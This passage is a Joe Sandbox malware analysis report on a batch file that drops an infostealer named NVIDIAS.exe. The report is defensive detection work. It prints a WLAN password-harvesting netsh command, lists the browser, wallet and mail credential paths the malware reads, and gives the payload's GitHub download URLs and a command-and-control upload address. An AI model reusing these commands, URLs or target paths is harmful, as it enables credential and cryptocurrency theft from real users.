Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Queries volume information: C:\ProgramData\QQQ\NVIDIAS.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

Source: Amcache.hve.LOG1.39.dr, Amcache.hve.39.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.LOG1.39.dr, Amcache.hve.39.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.39.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.LOG1.39.dr, Amcache.hve.39.dr	Binary or memory string: MsMpEng.exe

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q0C:\Users\user\AppData\Roaming\Electrum\walletst-
Source: NVIDIAS.exe, 00000015.00000002.1211552513.00000000035E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxxLiberty
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
Source: NVIDIAS.exe, 00000015.00000002.1211552513.00000000035E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus`,
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-

Tries to harvest and steal Bitcoin Wallet information

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: NVIDIAS.exe PID: 716, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	841 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	211 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	2 Obfuscated Files or Information	LSASS Memory	155 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 Software Packing	Security Account Manager	1051 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	65 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	3 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	65 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Services File Permissions Weakness	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3gJQoqWpxb.bat	8%	ReversingLabs	Win32.Coinminer.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\QQQ\NVIDIAS.exe	100%	Avira	HEUR/AGEN.1309950
C:\ProgramData\QQQ\NVIDIAS.exe	100%	Joe Sandbox ML
C:\ProgramData\QQQ\NVIDIAS.exe	71%	ReversingLabs	Win32.Trojan.Jalapeno

Source	Detection	Scanner	Label
http://89.23.100.233:1490/upload	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://89.23.100.233:1490/uploadt	0%	Avira URL Cloud	safe
http://upx.sf.net	0%	Avira URL Cloud	safe
http://beta.visualstudio.net/net/sdk/feedback.asp	0%	Avira URL Cloud	safe
http://89.23.100.233:1490	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	140.82.113.4	true	false	high
raw.githubusercontent.com	185.199.108.133	true	false	high
icanhazip.com	104.16.184.241	true	false	high
247.106.0.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/pr0niums/Repo/refs/heads/main/NVIDIAS.exe	false		high
http://icanhazip.com/	false		high
http://89.23.100.233:1490/upload	true	Avira URL Cloud: safe	unknown
https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://beta.visualstudio.net/net/sdk/feedback.asp	NVIDIAS.exe, 00000015.00000002.1225165858.0000000070701000.00000020.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	false		high
https://duckduckgo.com/ac/?q=	tmp44F6.tmp.dat.21.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp44F6.tmp.dat.21.dr	false		high
http://crl.ver)	svchost.exe, 0000001F.00000002.2120814233.0000020FFFE43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.39.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	false		high
https://ac.ecosia.org/autocomplete?q=	tmp44F6.tmp.dat.21.dr	false		high
https://www.google.com	NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	false		high
https://g.live.com/odclientsettings/Prod/C:	edb.log.31.dr	false		high
http://89.23.100.233:1490	NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	false		high
http://89.23.100.233:1490/uploadt	NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com0	svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp44F6.tmp.dat.21.dr	false		high
https://gemini.google.com/app?q=	tmp44F6.tmp.dat.21.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
140.82.113.4	github.com	United States	36459	GITHUBUS	false
89.23.100.233	unknown	Russian Federation	48687	MAXITEL-ASRU	true
104.16.184.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576243
Start date and time:	2024-12-16 17:25:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3gJQoqWpxb.bat
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winBAT@66/35@4/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 248 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 23.197.170.163, 20.190.135.16
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
